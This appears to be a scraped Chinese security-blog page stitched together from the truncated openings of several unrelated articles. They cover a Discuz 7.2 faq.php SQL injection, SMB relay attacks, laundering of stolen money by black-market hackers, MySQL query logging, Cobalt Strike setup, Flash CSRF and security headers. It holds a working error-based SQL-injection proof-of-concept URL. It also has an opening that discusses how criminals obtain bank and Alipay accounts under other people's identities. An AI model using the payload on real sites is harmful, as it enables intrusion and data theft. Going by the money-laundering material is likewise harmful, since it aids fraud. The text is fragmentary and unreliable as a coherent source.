discuz7.2 faq.php 最新注入漏洞分析

discuz7.2 faq.php 最新注入漏洞分析

之前乌云上被提交的漏洞,今天突然被人发出来了,然后就各种中枪。奈何各种考试马上就来了,我也没工夫去写exp或脚本什么的,趁点休息时间把代码看看就好。实话说我很讨厌这种情况,一大堆人会的不会的拿着别人发的exp刷漏洞,刷分刷钱。不如静下心来分析一下漏洞产生的原因,也算是我吃不到葡萄在说葡萄酸吧,笑。

因为有同学给出POC了,POC如下:

    http://www.xxx.com/faq.php?action=grouppermission&gids[99]='&gids[100][0]=) and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema
.tables group by x)a)%23

再谈SMB中继攻击

首先,介绍一下SMB中继攻击的运作原理

clip_image001

假设左边的主机为A,右边的主机为B

A试图访问B的共享服务

第一步 A对B说:骚年,请让我登陆

第二步 B对A说:骚年,我给你一个challenge,请先把你的密码Hash和challenge加密一下返回给我,我得确认你是否有权限

第三步 A对B说:我加密好了,给你

论黑产黑阔如何安全地转移赃款/洗钱?

0x00 背景

相信曾经与黑色产业打过交道的同鞋们对这个话题并不陌生。赃款转移,是黑色产业链中最重要的一环,因为这一环直接与黑阔们的收入息息相关。赃款转移地太过安全,容易产生巨额手续费/汇率而导致收入减少。赃款转移不够安全,容易导致水表被查,也就是那句:有命赚钱没命花钱。

下面将会在此文章中谈谈我曾经见过的黑钱转移手段以及自己的分析。各位看官娱乐娱乐即可,请不要将黑产的魔掌伸向普通老百姓,也请各位黑产黑阔们在洗别人银行卡的时候分析下对方的家境,毕竟“盗亦有道”。

0x01 细节

下面我们来从经济方面分析(即不考虑网监对黑阔进行技术侦查或黑阔完全隐蔽了自己的身份):

首先,我朝的黑阔收黑钱主要是两种渠道:支付宝以及银行黑卡

现在注册支付宝以及银行开户都要有本人的身份证,手机绑定等。既然有了身份证以及手机绑定,当局有实权部门即可轻易定位到有关人员,并上门查水表。所以黑产黑阔们首先要做的,就是买一个非自己身份开户的支付宝/银行卡

这些收款账户如何来呢?笔者尝试在谷歌上搜索“出售支付宝”并限定时间为2014-01-01 - 今天

开启MySQL的sql语句记录

在开发的时候经常会想看一下MySQL最终执行的sql或者想保存sql记录,所以我们可以启用MySQL的sql记录功能。

开启方法:
编辑MySQL的my.cnf文件,在文件的[mysqld]节点最下面添加下面的文本:

log-output=FILE
general-log=1
general_log_file=mysql-general.log

最后重启一下MySQL服务就可以了,最后会 记录在mysql的data\mysql-general.log文件中。

Cobalt Strike 之团队服务器的搭建与DNS通讯演示

0x00 背景


Cobalt Strike 一款以metasploit为基础的GUI的框框架式渗透工具,Armitage的商业版,集成了端口发、服务扫描,自动化溢出,多模式端口监听,win exe木马生成,win dll木马生成,java木马生成,office宏病毒生成,木马捆绑,mac os 木马生成,钓鱼攻击包括:站点克隆,目标信息获取,java执行,游览器自动攻击等等。

Cobalt Strike 官网为 Cobalt Strike 程序只不接受大天朝的下载,各位自行想办法。作者博客 有很多好东西,推荐大家收藏。

Flash CSRF

目录


0x00 Flash CSRF名词解释
0x01 Flash CSRF形成的原因
0x02 Flash CSRF可以干些什么
0x03 Flash CSRF如何利用
0x04 Flash CSRF怎么防御

0x00 Flash CSRF名词解释


CSRF(Cross-site request forgery跨站请求伪造,是一种对网站的恶意利用,CSRF则通过伪装来自受信任用户的请求来利用受信任的网站。

Flash CSRF通常是由于Crossdomain.xml文件配置不当造成的,利用方法是使用swf来发起跨站请求伪造。

0x01 Flash CSRF形成的原因


So 官腔我们也打了,还是要干点实事PS::)

为人民服务的好孩子,我们来看看如何寻找Flash CSRF:

首先我们要知道怎么形成CSRF

header的安全配置指南

0x00 背景


在统计了Alexa top 100万网站的header安全分析之后(2012年11月 - 2013年3月 - 2013年11月),我们发现其实如何正确的设置一个header并不是一件容易的事情。尽管有数不胜数的网站会使用大量有关安全方面的header,但并没有一个像样的平台能够为开发者们提供必要的信息,以辨别那些常见的错误设置。或者说,即使这些安全方面的header设置正确了,也没有一个平台能够为开发者提供一个系统的测试方法,用来测试正确与否。这些header如果设置错误了不仅会产生安全的假象,甚至会对网站的安全产生威胁。veracode认为安全性header是网络防护中非常重要的一环,并且他希望让开发者们能够简捷、正确地设置站点。如果您对某一header或设置有任何疑问,我们有极好的资源能够追踪到浏览器支持情况。

0x01 细节


1. X-XSS-Protection

目的